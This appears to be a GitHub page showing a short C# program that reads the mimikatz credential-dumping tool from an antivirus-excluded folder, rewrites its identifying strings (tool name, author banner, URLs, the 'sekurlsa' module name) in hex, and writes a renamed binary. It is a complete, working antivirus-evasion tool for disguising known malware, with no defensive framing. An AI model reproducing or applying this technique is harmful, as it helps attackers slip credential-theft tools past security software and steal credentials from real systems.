-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathProgram.cs
120 lines (91 loc) · 4.62 KB
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace ReplaceString
{
class Program
{
static void Main(string[] args)
{
var hexrep = ExeToHex(@"C:\tools\excluded\mimikatz.exe");
string replacedHex = ReplaceString(hexrep, @"mimikatz", "mimifish");
replacedHex = ReplaceString(replacedHex, @"## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )", @" /*** Benjamin fishY gentilfish ( [email protected] )");
replacedHex = ReplaceString(replacedHex, @".#####. mimifish 2.2.0 (x64) #18362 May 13 2019 01:35:04", @" mimifish 2.2.0 (x64) May 13 2019 ");
replacedHex = ReplaceString(replacedHex, @"'#####' > http://pingcastle.com / http://mysmartlogon.com ***/", @" ");
replacedHex = ReplaceString(replacedHex, @".## ^ ##. ", @" ");
replacedHex = ReplaceString(replacedHex, @"## \ / ## > http://blog.gentilkiwi.com/mimifish", @" ");
replacedHex = ReplaceString(replacedHex, @"'## v ##' Vincent LE TOUX ( [email protected] )", @" ");
replacedHex = ReplaceString(replacedHex, @"sekurlsa", @"sekufish");
HexToExe(replacedHex);
}
public static string ExeToHex(string filename)
{
var miMimi = System.IO.File.ReadAllBytes(filename);
//Convert byte-array to Hex-string
StringBuilder hexBuilder = new StringBuilder();
foreach (byte b in miMimi)
{
string hexByte = b.ToString("X");
//make sure each byte is represented by 2 Hex digits
string tempString = hexByte.Length % 2 == 0 ? hexByte : hexByte.PadLeft(2, '0');
hexBuilder.Append(tempString);
}
return hexBuilder.ToString();
}
public static string ReplaceString(string hexFileInMemory, string find, string replace)
{
byte[] ba = Encoding.Unicode.GetBytes(find);
//var hexString = BitConverter.ToString(ba);
StringBuilder hexBuilderFind = new StringBuilder();
foreach (byte b in ba)
{
string hexByte = b.ToString("X");
//make sure each byte is represented by 2 Hex digits
string tempString = hexByte.Length % 2 == 0 ? hexByte : hexByte.PadLeft(2, '0');
hexBuilderFind.Append(tempString);
}
var search = hexBuilderFind.ToString().Replace("{", "").Replace("}", "");
var isFound = hexFileInMemory.Contains(search);
if (isFound)
{
byte[] baReplace = Encoding.Unicode.GetBytes(replace);
//var hexString = BitConverter.ToString(ba);
StringBuilder hexBuilderReplace = new StringBuilder();
foreach (byte b in baReplace)
{
string hexByte = b.ToString("X");
//make sure each byte is represented by 2 Hex digits
string tempString = hexByte.Length % 2 == 0 ? hexByte : hexByte.PadLeft(2, '0');
hexBuilderReplace.Append(tempString);
}
return hexFileInMemory.Replace(hexBuilderFind.ToString(), hexBuilderReplace.ToString());
}
else
{
return hexFileInMemory;
}
}
public static void HexToExe(string hex)
{
//Convert Hex-string from DB to byte-array
var hexSting = hex;
int length = hexSting.Length;
List<byte> byteList = new List<byte>();
//Take 2 Hex digits at a time
for (int i = 0; i < length; i += 2)
{
byte byteFromHex = Convert.ToByte(hexSting.Substring(i, 2), 16);
byteList.Add(byteFromHex);
}
byte[] byteArray = byteList.ToArray();
using (System.IO.BinaryWriter srBackToEXE = new System.IO.BinaryWriter(File.OpenWrite(@"C:\tools\excluded\mimihex.exe")))
{
srBackToEXE.Write(byteArray);
srBackToEXE.Flush();
};
}
}
}